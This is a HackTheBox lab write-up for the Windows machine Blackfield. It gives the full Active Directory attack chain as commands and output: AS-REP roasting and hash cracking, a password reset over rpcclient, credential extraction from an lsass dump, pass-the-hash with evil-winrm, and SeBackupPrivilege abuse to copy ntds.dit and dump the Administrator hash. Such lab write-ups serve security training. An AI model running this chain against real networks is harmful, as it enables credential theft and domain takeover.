Posts Blackfield Writeup [HTB]
Post
Cancel

Blackfield Writeup [HTB]

Blackfield is a Windows machine rated as difficult from HackTheBox, it is an Active Directory machine where a kerberoasting attack is performed and then some forensics is required in order to obtain a hash for initial access, then administrator access is obtained abusing SeBackupPrivilege.

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
nmap -sC -sV 10.10.10.192
Nmap scan report for BLACKFIELD.local (10.10.10.192)
Host is up (0.21s latency).
Not shown: 993 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-10-03 15:06:52Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)

As we can see it is an active directory machine.

We will use smbclient to enumerate samba shares :

1
2
3
4
5
6
7
8
9
10
smbclient -L 10.10.10.192
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk      
        SYSVOL          Disk      Logon server share

Trying to list contents in the forensic share we get access denied :

1
2
3
smbclient \\\\10.10.10.192\\forensic
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*

Then, connecting to profiles$ gives a huge list of directories which seem to be usernames :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
smbclient \\\\10.10.10.192\\profiles$
smb: \> dir                                                                                                                
  .                                   D        0  Wed Jun  3 18:47:12 2020                                                 
  ..                                  D        0  Wed Jun  3 18:47:12 2020                                                 
  AAlleni                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ABarteski                           D        0  Wed Jun  3 18:47:11 2020                                                 
  ABekesz                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ABenzies                            D        0  Wed Jun  3 18:47:11 2020                                                 
  ABiemiller                          D        0  Wed Jun  3 18:47:11 2020                                                 
  AChampken                           D        0  Wed Jun  3 18:47:11 2020                                                 
  ACheretei                           D        0  Wed Jun  3 18:47:11 2020                                                 
  ACsonaki                            D        0  Wed Jun  3 18:47:11 2020                                                 
  AHigchens                           D        0  Wed Jun  3 18:47:11 2020                                                 
  AJaquemai                           D        0  Wed Jun  3 18:47:11 2020                                                 
  AKlado                              D        0  Wed Jun  3 18:47:11 2020                                                 
  AKoffenburger                       D        0  Wed Jun  3 18:47:11 2020                                                 
  AKollolli                           D        0  Wed Jun  3 18:47:11 2020                                                 
  AKruppe                             D        0  Wed Jun  3 18:47:11 2020                                                 
  AKubale                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ALamerz                             D        0  Wed Jun  3 18:47:11 2020                                                 
  AMaceldon                           D        0  Wed Jun  3 18:47:11 2020                                                 
  AMasalunga                          D        0  Wed Jun  3 18:47:11 2020                                                 
  ANavay                              D        0  Wed Jun  3 18:47:11 2020                                                 
  ANesterova                          D        0  Wed Jun  3 18:47:11 2020                                                 
  ANeusse                             D        0  Wed Jun  3 18:47:11 2020                                                 
  AOkleshen                           D        0  Wed Jun  3 18:47:11 2020                                                 
  APustulka                           D        0  Wed Jun  3 18:47:11 2020                                                 
  ARotella                            D        0  Wed Jun  3 18:47:11 2020                                                 
  ASanwardeker                        D        0  Wed Jun  3 18:47:11 2020                                                 
  AShadaia                            D        0  Wed Jun  3 18:47:11 2020                                                 
  ASischo                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ASpruce                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ATakach                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ATaueg                              D        0  Wed Jun  3 18:47:11 2020                                                 
  ATwardowski                         D        0  Wed Jun  3 18:47:11 2020                                                 
  audit2020                           D        0  Wed Jun  3 18:47:11 2020                                                 
  AWangenheim                         D        0  Wed Jun  3 18:47:11 2020
  ...

All the contents were copied to a userlist and then modified to delete the junk with the following bash command :

1
cat users.txt | awk '{print $1 > "text.txt"}'

Exploitation

Now that we have a user list, we can try to use GetNPUsers.py from impacket, performing a Keberoasting attack to see if we are able to get any TGT .

We already know the domain name from nmap scan : BLACKFIELD.local and we will generate the hash in john format to crack it later .

1
2
3
4
5
6
7
8
9
GetNPUsers.py BLACKFIELD.local/ -usersfile users.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

After a while we check the hashes file and find a TGT for support :

1
2
cat hashes.txt
$krb5asrep$support@BLACKFIELD.LOCAL:971dafdacb7ef8b994fde97b1da3e9f7$37f9724cdd1f09f1055d9261954951229c7eb2f320512b823127431fbfc61c846c9743b554a9c5462ca86f542d78bdc265cdee806fd7fc33e05785d7b1d93d70d8835818e5eecf7923017ca53b5bbfc288c646c48f52b910286a67ed7d96ff64d4cf7a346d1ae919d7da2153d8fd1ee782e6f6750eb9497ad9eb6f7fe77fc97d924282d4533e7669b4b0f54765be92ad35570f41739821adae12d9ba225d6c6d14736f3b87328ac924809c3d446739232bc766aeea2366a44f40532eca09241c1672f0f11ac5641dbc87af954512553e856783bf62f377c3badce8e77aa56f0ff42fd40f99c68e17319065312ed35f5ed380c964

Now we can crack it with john :

1
2
3
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show hashes.txt
$krb5asrep$support@BLACKFIELD.LOCAL:#00^BlackKnight

With these credentials we can try to access rpcclient :

1
2
3
rpcclient 10.10.10.192 -U support
Enter WORKGROUP\support's password:
rpcclient $>

Enumerating users we find new ones such as audit2020 :

1
2
3
4
5
6
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]

We can also try to enumerate the privileges of support account to see if we can do something with them :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)

As we see there are lots of privileges, after investigating for a while I found that user passwords could be changed from rpcclient, so I decided to try with audit2020 account and got succesful :

1
rpcclient $> setuserinfo2 audit2020 23 'N0xi0us'

Now with this account we can enumerate the contents of the forensic share :

1
2
3
4
5
6
7
8
smbclient -U audit2020 \\\\10.10.10.192\\forensic
Enter WORKGROUP\audit2020's password:
smb: \> dir
  .                                   D        0  Sun Feb 23 14:03:16 2020
  ..                                  D        0  Sun Feb 23 14:03:16 2020
  commands_output                     D        0  Sun Feb 23 19:14:37 2020
  memory_analysis                     D        0  Thu May 28 22:28:33 2020
  tools

There, inside memory_analysis we find an interesting file belonging to Windows’s Local Security Authority Service :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
smb: \memory_analysis\> dir
  .                                   D        0  Thu May 28 22:28:33 2020
  ..                                  D        0  Thu May 28 22:28:33 2020
  conhost.zip                         A 37876530  Thu May 28 22:25:36 2020
  ctfmon.zip                          A 24962333  Thu May 28 22:25:45 2020
  dfsrs.zip                           A 23993305  Thu May 28 22:25:54 2020
  dllhost.zip                         A 18366396  Thu May 28 22:26:04 2020
  ismserv.zip                         A  8810157  Thu May 28 22:26:13 2020
  lsass.zip                           A 41936098  Thu May 28 22:25:08 2020
  mmc.zip                             A 64288607  Thu May 28 22:25:25 2020
  RuntimeBroker.zip                   A 13332174  Thu May 28 22:26:24 2020
  ServerManager.zip                   A 131983313  Thu May 28 22:26:49 2020
  sihost.zip                          A 33141744  Thu May 28 22:27:00 2020
  smartscreen.zip                     A 33756344  Thu May 28 22:27:11 2020
  svchost.zip                         A 14408833  Thu May 28 22:27:19 2020
  taskhostw.zip                       A 34631412  Thu May 28 22:27:30 2020
  winlogon.zip                        A 14255089  Thu May 28 22:27:38 2020
  wlms.zip                            A  4067425  Thu May 28 22:27:44 2020
  WmiPrvSE.zip                        A 18303252  Thu May 28 22:27:53 2020

Trying to download it we get an error , so we can try to mount the directory in our machine :

1
2
3
4
5
smb: \memory_analysis\> get lsass.zip
Error opening local file lsass.zip
mount -t cifs //10.10.10.192/forensic/memory_analysis /mnt -o user=aud
it2020
🔐 Password for audit2020@//10.10.10.192/forensic/memory_analysis:  *******

After unzipping it , we find it contains a memory dump file :

1
2
ls -l lsass.DMP
-rw-r--r-- 1 root root 143044222 Feb 23  2020 lsass.DMP

So according to this article we can use mimikatz to extract password hashes.

As we are in Linux we can use an alternative to mimikatz built with python called pypykatz.

We just need to modify a bit the mimikatz syntax and run it, as the output is so huge I will only show the relevant part :

1
2
3
4
5
pypykatz lsa minidump lsass.DMP
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d

With this hash, we can abuse the pass-the-hash technique and obtain a shell using evil-winrm :

1
2
3
4
5
6
7
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup

Privilege Escalation

Checking this account privileges we see the account has enabled SeBackupPrivilege :

1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

With this privilege we have access to every file on the system, a more detailed explanation of this privilege can be found in this set of slides

We can get the admin hash by obtaining Windows’s registry file system and ntds.dit (database which stores AD information) and then using impacket secretsdump on them.

System file can be downloaded easily :

1
2
3
4
5
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.hive
Info: Downloading C:\Users\svc_backup\Documents\system.hive to system.hive


Info: Download successful!

To obtain NTDS.dit we first need to use diskshadow to mount a shadow copy, in order to do that we will use the following script :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
*Evil-WinRM* PS C:\tmp> upload script.txt                                                                                  
Info: Uploading script.txt to C:\tmp\script.txt                                                                            


Data: 108 bytes of 108 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\tmp> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  10/3/2020 9:33:44 AM

-> set context persistent
-> add volume c: alias mydrive
-> create
Alias mydrive for shadow ID {69711bad-ca22-4576-94eb-daa71cc185be} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {af8518f9-cee1-49d3-8b7e-553757aa0761} set as environment variable.

Querying all shadow copies with the shadow copy set ID {af8518f9-cee1-49d3-8b7e-553757aa0761}

        * Shadow copy ID = {69711bad-ca22-4576-94eb-daa71cc185be}               %mydrive%
                - Shadow copy set: {af8518f9-cee1-49d3-8b7e-553757aa0761}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 10/3/2020 9:34:20 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent Differential

Number of shadow copies listed: 1
-> expose %mydrive% z:
-> %mydrive% = {69711bad-ca22-4576-94eb-daa71cc185be}
The shadow copy was successfully exposed as z:\.

Now we need to upload and import two DLL to impersonate a backup software :

1
2
3
4
*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\tmp> Import-Module ./SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\tmp> Import-Module ./SeBackupPrivilegeUtils.dll

Then, we copy ntds.dit from the shadow copy to our temp directory and download it :

1
2
*Evil-WinRM* PS C:\tmp> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\tmp\ntds.dit
*Evil-WinRM* PS C:\tmp> download ntds.dit

Finally we use secretsdump to obtain the admin hash :

1
2
3
4
5
6
7
8
9
secretsdump.py  -system system -ntds ntds.dit LOCAL
Impacket v0.9.22.dev1+20200728.230151.48a3124c - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::

We can just obtain an admin shell using again pass-the-hash:

1
2
3
4
5
6
7
evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
This post is licensed under CC BY 4.0 by the author.